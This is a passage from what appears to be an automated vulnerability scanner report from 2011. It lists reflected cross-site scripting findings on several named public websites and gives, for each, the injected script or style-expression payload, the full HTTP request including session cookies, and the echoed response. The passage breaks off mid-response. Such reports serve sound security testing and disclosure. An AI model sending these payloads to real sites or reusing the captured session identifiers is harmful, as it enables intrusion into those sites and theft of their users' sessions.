The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 534e3"><script>alert(1)</script>cc90e15a4bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers534e3"><script>alert(1)</script>cc90e15a4bf/support/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:56:37 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers534e3"><script>alert(1)</script>cc90e15a4bf/support/article?id=1343" />
...[SNIP]...

6.77. http://www.quantumjumping.com/customers/support/article [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67737"><script>alert(1)</script>0bd5c80bbcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers/support67737"><script>alert(1)</script>0bd5c80bbcd/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:57:11 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers/support67737"><script>alert(1)</script>0bd5c80bbcd/article?id=1343" />
...[SNIP]...

6.78. http://www.quantumjumping.com/customers/support/article [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1bef"><script>alert(1)</script>39db3655b7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers/support/articlee1bef"><script>alert(1)</script>39db3655b7e?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:57:47 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers/support/articlee1bef"><script>alert(1)</script>39db3655b7e?id=1343" />
...[SNIP]...

6.79. http://www.quantumjumping.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34c4"><script>alert(1)</script>42602835c1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PHPSESSID cookie set in this response carries no HttpOnly flag, so script injected here can read it through document.cookie.

Request

GET /favicon.icoa34c4"><script>alert(1)</script>42602835c1e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quantumjumping.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:42:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=ta0onjdvur4f6tbul61gpqio05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/favicon.icoa34c4"><script>alert(1)</script>42602835c1e" />
...[SNIP]...

6.80. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8986"><script>alert(1)</script>7ed0089077c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediae8986"><script>alert(1)</script>7ed0089077c/themes/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:01 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/mediae8986"><script>alert(1)</script>7ed0089077c/themes/images/a/call.png" />
...[SNIP]...

6.81. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 927df"><script>alert(1)</script>db7370f1191 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes927df"><script>alert(1)</script>db7370f1191/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:22 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes927df"><script>alert(1)</script>db7370f1191/images/a/call.png" />
...[SNIP]...

6.82. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983cd"><script>alert(1)</script>b351945b4cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images983cd"><script>alert(1)</script>b351945b4cb/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:48 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images983cd"><script>alert(1)</script>b351945b4cb/a/call.png" />
...[SNIP]...

6.83. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89853"><script>alert(1)</script>f94a3e06c7e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a89853"><script>alert(1)</script>f94a3e06c7e/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:57:11 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a89853"><script>alert(1)</script>f94a3e06c7e/call.png" />
...[SNIP]...

6.84. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1319a"><script>alert(1)</script>a1b0bda2cd6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a/call.png1319a"><script>alert(1)</script>a1b0bda2cd6 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:57:35 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a/call.png1319a"><script>alert(1)</script>a1b0bda2cd6" />
...[SNIP]...

6.85. http://www.quantumjumping.com/media/themes/images/a/call.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d05"><script>alert(1)</script>5c30f734075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a/call.png?d8d05"><script>alert(1)</script>5c30f734075=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:54:50 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a/call.png?d8d05"><script>alert(1)</script>5c30f734075=1" />
...[SNIP]...

6.86. http://www.quantumjumping.com/products [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /products

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f40"><script>alert(1)</script>6af7e86c800 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /productsa9f40"><script>alert(1)</script>6af7e86c800 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/productsa9f40"><script>alert(1)</script>6af7e86c800" />
...[SNIP]...

6.87. http://www.quantumjumping.com/products [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /products

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cc4"><script>alert(1)</script>a4da606a7e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products?87cc4"><script>alert(1)</script>a4da606a7e0=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 111829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
       <script>
f
...[SNIP]...
<input type="hidden" name="atag" value="/products?87cc4"><script>alert(1)</script>a4da606a7e0=1" />
...[SNIP]...

6.88. http://www.rapidmaniac.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rapidmaniac.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93f70'style%3d'x%3aexpression(alert(1))'615d99451f0 was submitted in the REST URL parameter 1. This input was echoed as 93f70'style='x:expression(alert(1))'615d99451f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico93f70'style%3d'x%3aexpression(alert(1))'615d99451f0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rapidmaniac.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Wed, 04 May 2011 01:11:13 GMT
Content-Type: text/html; charset=utf8
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: PHPSESSID=3450e48a4688bc5d2e6a6ccaba296d93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
...[SNIP]...
<script type='text/javascript' src='/actions/event_tracker.php?referer=&page=/favicon.ico93f70'style='x:expression(alert(1))'615d99451f0&enter=1'>
...[SNIP]...

6.89. http://www.reflector.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4697"><script>alert(1)</script>1d296c9f2d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa4697"><script>alert(1)</script>1d296c9f2d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:29:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=7935e01a0a8c0a4b7b880f1c344351a4; expires=Fri, 27-May-2011 06:59:51 GMT; path=/; domain=.reflector.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
